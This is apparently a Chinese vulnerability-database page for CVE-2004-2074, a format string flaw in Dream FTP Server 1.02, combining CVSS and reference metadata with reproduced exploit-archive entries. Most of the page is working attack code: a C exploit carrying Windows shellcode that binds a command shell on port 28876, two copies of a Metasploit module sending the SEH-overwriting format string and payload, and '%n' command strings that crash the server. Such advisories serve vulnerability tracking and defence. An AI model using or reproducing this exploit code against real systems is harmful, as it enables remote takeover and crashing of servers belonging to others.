CVE-2004-2074
CVSS5.0
发布时间 :2004-12-31 00:00:00
修订时间 :2008-09-05 16:43:07
NMCOEPS    

[原文]Format string vulnerability in Dream FTP 1.02 allows local users to cause a denial of service (crash) via format string specifiers in the (1) PASS or (2) RETR commands.


[CNNVD]Dream FTP格式字符串漏洞(CNNVD-200412-1193)

        Dream FTP 1.02版本存在格式字符串漏洞。本地用户借助(1) PASS或者(2) RETR命令里的格式字符串导致服务拒绝(崩溃)。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2074
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2074
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-1193
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/15380
(UNKNOWN)  XF  dreamftp-command-format-string(15380)
http://www.securityfocus.com/bid/9800
(UNKNOWN)  BID  9800
http://securitytracker.com/id?1009295
(UNKNOWN)  SECTRACK  1009295

- 漏洞信息

Dream FTP格式字符串漏洞
中危 格式化字符串
2004-12-31 00:00:00 2005-10-20 00:00:00
远程  
        Dream FTP 1.02版本存在格式字符串漏洞。本地用户借助(1) PASS或者(2) RETR命令里的格式字符串导致服务拒绝(崩溃)。

- 公告与补丁

        

- 漏洞信息 (823)

Dream FTP 1.2 Remote Format String Exploit (EDBID:823)
windows remote
2004-02-11 Verified
21 SkyLined
[点击下载] [点击下载]
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

// WIN NT/2K/XP cmd.exe shellcode
// kernel32.dll baseaddress calculation: OS/SP-independent
// string-save: 00, 0a and 0d free.
// portbinding: port 28876
// looping: reconnect after disconnect
char* shellcode = 
  "\xeb\x43\x56\x57\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x52\x8b\x52"
  "\x20\x01\xea\x31\xc0\x31\xc9\x41\x8b\x34\x8a\x01\xee\x31\xff\xc1"
  "\xcf\x13\xac\x01\xc7\x85\xc0\x75\xf6\x39\xdf\x75\xea\x5a\x8b\x5a"
  "\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01"
  "\xe8\x5f\x5e\xff\xe0\xfc\x31\xc0\x64\x8b\x40\x30\x8b\x40\x0c\x8b"
  "\x70\x1c\xad\x8b\x68\x08\x31\xc0\x66\xb8\x6c\x6c\x50\x68\x33\x32"
  "\x2e\x64\x68\x77\x73\x32\x5f\x54\xbb\x71\xa7\xe8\xfe\xe8\x90\xff"
  "\xff\xff\x89\xef\x89\xc5\x81\xc4\x70\xfe\xff\xff\x54\x31\xc0\xfe"
  "\xc4\x40\x50\xbb\x22\x7d\xab\x7d\xe8\x75\xff\xff\xff\x31\xc0\x50"
  "\x50\x50\x50\x40\x50\x40\x50\xbb\xa6\x55\x34\x79\xe8\x61\xff\xff"
  "\xff\x89\xc6\x31\xc0\x50\x50\x35\x02\x01\x70\xcc\xfe\xcc\x50\x89"
  "\xe0\x50\x6a\x10\x50\x56\xbb\x81\xb4\x2c\xbe\xe8\x42\xff\xff\xff"
  "\x31\xc0\x50\x56\xbb\xd3\xfa\x58\x9b\xe8\x34\xff\xff\xff\x58\x60"
  "\x6a\x10\x54\x50\x56\xbb\x47\xf3\x56\xc6\xe8\x23\xff\xff\xff\x89"
  "\xc6\x31\xdb\x53\x68\x2e\x63\x6d\x64\x89\xe1\x41\x31\xdb\x56\x56"
  "\x56\x53\x53\x31\xc0\xfe\xc4\x40\x50\x53\x53\x53\x53\x53\x53\x53"
  "\x53\x53\x53\x6a\x44\x89\xe0\x53\x53\x53\x53\x54\x50\x53\x53\x53"
  "\x43\x53\x4b\x53\x53\x51\x53\x87\xfd\xbb\x21\xd0\x05\xd0\xe8\xdf"
  "\xfe\xff\xff\x5b\x31\xc0\x48\x50\x53\xbb\x43\xcb\x8d\x5f\xe8\xcf"
  "\xfe\xff\xff\x56\x87\xef\xbb\x12\x6b\x6d\xd0\xe8\xc2\xfe\xff\xff"
  "\x83\xc4\x5c\x61\xeb\x89";

int main(int argc, char *argv[], char *envp[]) {
  int sock;
  FILE* FILEsock;
  struct sockaddr_in addr;
  int port = 21;
  char buffer[1024];

  if (argc<2 || argc>3) {
    printf("Usage: %s IP [PORT]\n", argv[0]);
    exit(-1);
  }
  if (argc == 3) port = atoi(argv[2]);

  printf("- Nightmare --------------------------------------------------\n"
         "  Dream FTP v1.2 formatstring exploit.\n"
         "  Written by SkyLined <SkyLined@EduP.TUDelft.nl>.\n"
         "  Credits for the vulnerability go to badpack3t\n"
         "                           <badpack3t@security-protocols.com>.\n"
         "  Shellcode based on work by H D Moore (www.metasploit.com).\n"
         "  Greets to everyone at 0dd and #netric.\n"
         "  (K)(L)(F) for Suzan.\n"
         "\n"
         "  Binds a shell at %s:28876 if successfull.\n"
         "  Tested with: WIN2KEN/Dream FTP v1.2 (1.02/TryFTP 1.0.0.1)\n"
         "--------------------------------------------------------------\n",
         argv[1]);

  addr.sin_family = AF_INET;
  addr.sin_port = htons(port);
  addr.sin_addr.s_addr = inet_addr(argv[1]);

  if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1 ||
      connect(sock, (struct sockaddr *)&addr, sizeof addr) == -1 ||
      (FILEsock = fdopen(sock, "r+")) == NULL) {
    fprintf(stderr, "\n[-] Connection to %s:%d failed: ", argv[1], port);
    perror(NULL);
    exit(-1);
  }

  printf("\n[+] Connected to %s:%d.\n", argv[1], port);
  do printf("  --> %s", fgets(buffer, sizeof buffer, FILEsock));
    while (strstr(buffer, "220-") == buffer);

  printf("\n[+] Sending exploit string...\n");
  fprintf(FILEsock,
    // Argument 10 points to the SEH handler code, it's RWE so we'll change
    // the SEH handler to redirect execution to the beginning of our
    // formatstring. When the SEH handler is called [ebx+0x3c] points
    // to the start of our formatstring, we just have to jump over the
    // formatstring exploit itself to our shellcode:
    "\xeb\x29" // Jump over the formatstring exploit
    "%%8x%%8x%%8x%%8x%%8x%%8x%%8x%%8x%%%dd%%n"     // Argument 10 -> SEH
    "%%n" // Causes exception after SEH adjustment.
    "@@@@@@@@" // nopslide landing zone for jump
    "%s\r\n", // shellcode
    0x3C63FF-0x4f, // New SEH code = 0x3C63FF (jmp *0x3c(%ebx) | jmp [EBX+0x3C])
    shellcode);
  fflush(FILEsock); 
  close(sock);
  printf("\n[+] Done, allow a few seconds on a slow target before you can\n"
           "    connect to %s:28876.\n", argv[1]);
  return 0;
}

// milw0rm.com [2004-02-11]
		

- 漏洞信息 (16712)

BolinTech Dream FTP Server 1.02 Format String (EDBID:16712)
windows remote
2010-06-22 Verified
21 metasploit
[点击下载] [点击下载]
##
# $Id: dreamftp_format.rb 9583 2010-06-22 19:11:05Z todb $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'		=> 'BolinTech Dream FTP Server 1.02 Format String',
			'Description'	=> %q{
					This module exploits a format string overflow in the BolinTech
				Dream FTP Server version 1.02. Based on the exploit by SkyLined.
			},
			'Author' 		=> [ 'Patrick Webster <patrick[at]aushack.com>' ],
			'Arch'		=> [ ARCH_X86 ],
			'License'        	=> MSF_LICENSE,
			'Version'        	=> '$Revision: 9583 $',
			'References'     =>
				[
					[ 'CVE', '2004-2074'],
					[ 'OSVDB', '4986'],
					[ 'BID', '9800'],
					[ 'URL', 'http://www.milw0rm.com/exploits/823'],
				],
			'Platform' 	=> ['win'],
			'Privileged'	=> false,
			'Payload'		=>
				{
					'Space'			=> 1000,
					'BadChars'		=> "\x00\x0a\x0d",
					'StackAdjustment'	=> -3500,
				},
			'Targets' 		=>
			[
				# Patrick - Tested OK 2007/09/10 against w2ksp0, w2ksp4 en.
				[
					'Dream FTP Server v1.02 Universal',
					{
						'Offset'			=> 3957680, # 0x3c63ff-0x4f
					}
				],
			],
			'DisclosureDate' => 'Mar 03 2004',
			'DefaultTarget' => 0))

		register_options(
			[
				Opt::RPORT(21),
			], self.class)
	end

	def check
		connect
		banner = sock.get(-1,3)
		disconnect
		if (banner =~ /Dream FTP Server/)
			return Exploit::CheckCode::Appears
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		connect
		select(nil,nil,nil,0.25)
		sploit = "\xeb\x29"
		sploit << "%8x%8x%8x%8x%8x%8x%8x%8x%" + target['Offset'].to_s + "d%n%n"
		sploit << "@@@@@@@@" + payload.encoded
		sock.put(sploit + "\r\n")
		select(nil,nil,nil,0.25)
		handler
		disconnect
	end

end
		

- 漏洞信息 (F83174)

BolinTech Dream FTP Server 1.02 Format String (PacketStormID:F83174)
2009-11-27 00:00:00
Patrick Webster  metasploit.com
exploit,overflow
CVE-2004-2074
[点击下载]

This Metasploit module exploits a format string overflow in the BolinTech Dream FTP Server version 1.02. Based on the exploit by SkyLined.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/ 
##

require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,	
			'Name'		=> 'BolinTech Dream FTP Server 1.02 Format String',
			'Description'	=> %q{
				This module exploits a format string overflow in the BolinTech
				Dream FTP Server version 1.02. Based on the exploit by SkyLined.
			},
			'Author' 		=> [ 'Patrick Webster <patrick[at]aushack.com>' ],
			'Arch'		=> [ ARCH_X86 ],
			'License'        	=> MSF_LICENSE,
			'Version'        	=> '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2004-2074'],
					[ 'OSVDB', '4986'],
					[ 'BID', '9800'],
					[ 'URL', 'http://www.milw0rm.com/exploits/823'],
				],
			'Platform' 	=> ['win'],
			'Privileged'	=> false,
			'Payload'		=>
				{
					'Space'			=> 1000,
					'BadChars'		=> "\x00\x0a\x0d",
					'StackAdjustment'	=> -3500,
				},
			'Targets' 		=>
			[
			# Patrick - Tested OK 2007/09/10 against w2ksp0, w2ksp4 en.
				[
					'Dream FTP Server v1.02 Universal',
					{
						'Offset'			=> 3957680, # 0x3c63ff-0x4f
					}
				],
			],
			'DisclosureDate' => 'Mar 03 2004',
			'DefaultTarget' => 0))
			
			register_options(
			[
				Opt::RPORT(21),
			], self.class)
	end

	def check
		connect
		banner = sock.get(-1,3)
		disconnect
		if (banner =~ /Dream FTP Server/)
			return Exploit::CheckCode::Appears
		end
		return Exploit::CheckCode::Safe
	end
	
	def exploit
		connect
		sleep(0.25)
		sploit = "\xeb\x29"
		sploit << "%8x%8x%8x%8x%8x%8x%8x%8x%" + target['Offset'].to_s + "d%n%n"
		sploit << "@@@@@@@@" + payload.encoded
		sock.put(sploit + "\r\n")
		sleep(0.25)
		handler
		disconnect
	end

end
    

- 漏洞信息

34373
Dream FTP Multiple Command Format String DoS
Local / Remote, Context Dependent Denial of Service, Input Manipulation
Loss of Integrity, Loss of Availability

- 漏洞描述

Unknown or Incomplete

- 时间线

2004-03-03 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

BolinTech Dream FTP Server FTP Command Format String Vulnerability
Input Validation Error 9800
Yes No
2004-03-03 12:00:00 2008-01-30 09:47:00
Discovery of this vulnerability has been credited to "intuit" <intuit@linuxmail.org>.

- 受影响的程序版本

BolinTech Dream FTP Server 1.0 2

- 漏洞讨论

Dream FTP Server is prone to a remote format-string vulnerability when processing a malicious request from a client.

Exploiting this issue could allow an attacker to crash the server and possibly to execute arbitrary code on the system hosting the server. This would occur in the security context of the server process.

- 漏洞利用

The following examples have been supplied:

user %n
pass %n
retr %n
...
and just "%n" in command line.

The following exploit code is available as a module from the Metasploit Framework:

- 解决方案

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站